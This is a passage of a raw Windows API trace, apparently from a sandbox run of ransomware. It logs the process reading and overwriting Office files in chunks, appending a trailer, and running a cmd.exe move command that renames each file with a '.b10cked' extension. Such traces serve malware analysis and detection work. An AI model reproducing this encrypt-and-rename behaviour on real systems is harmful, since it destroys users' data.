lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 
[0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x137478 [0161.548] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0161.562] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0161.562] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0161.562] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x137960 [0161.562] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0161.562] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0161.563] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0161.563] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x137960 [0161.563] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0161.563] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0161.563] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0161.572] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0161.631] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0161.632] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0161.632] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0161.633] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0161.633] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0161.633] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0161.633] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: 
lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0161.641] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0161.801] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0161.804] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0161.804] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0161.804] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0161.805] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0161.805] SetFilePointer (in: hFile=0x114, lDistanceToMove=786432, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0000 [0161.805] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0161.897] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: 
lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0161.988] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0161.990] SetFilePointer (in: hFile=0x114, lDistanceToMove=786432, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0000 [0161.990] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0161.990] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0161.991] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0161.991] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x117960 [0161.991] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0162.012] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0162.013] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: 
lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0162.015] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x117960 [0162.015] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0162.015] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0162.015] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0162.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0162.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XLINTL32.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0162.021] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x137960 [0162.021] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0162.021] CloseHandle (hObject=0x114) returned 1 [0162.032] 
GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX") returned 0x3c [0162.032] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0162.033] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xd94, dwThreadId=0xd58)) returned 1 [0162.034] CloseHandle (hObject=0x1b4) returned 1 [0162.034] CloseHandle (hObject=0x114) returned 1 [0162.034] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0162.034] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", 
cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0162.034] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0162.034] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0162.034] ReleaseMutex (hMutex=0xf8) returned 1 [0162.034] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0162.034] ReleaseMutex (hMutex=0xf8) returned 1 [0162.034] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0162.035] ReleaseMutex (hMutex=0xf8) returned 1 [0162.035] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0162.035] ReleaseMutex (hMutex=0xf8) returned 1 [0162.035] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d60 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.035] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21882416166) returned 1 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d60 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d60 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3d60 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d60 [0162.035] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d60 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d60 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d60 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d60 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d60 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.036] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3878 [0162.036] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0162.048] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0162.049] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0162.049] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3d60 [0162.049] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0162.049] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0162.049] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0162.049] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3d60 [0162.049] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0162.049] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0162.049] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1eaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1eaf, lpOverlapped=0x0) returned 1 [0162.050] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0162.050] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1eaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1eaf, lpOverlapped=0x0) returned 1 [0162.050] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7855, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1eb1 [0162.050] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1eaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1eaf, lpOverlapped=0x0) returned 1 [0162.050] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7855, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1eb1 [0162.050] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1eaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1eaf, lpOverlapped=0x0) returned 1 [0162.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLSLICER.DLL.trx_dll", cchWideChar=20, 
lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0162.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLSLICER.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XLSLICER.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0162.054] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3d60 [0162.054] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0162.054] CloseHandle (hObject=0x114) returned 1 [0162.055] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX") returned 0x3c [0162.056] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 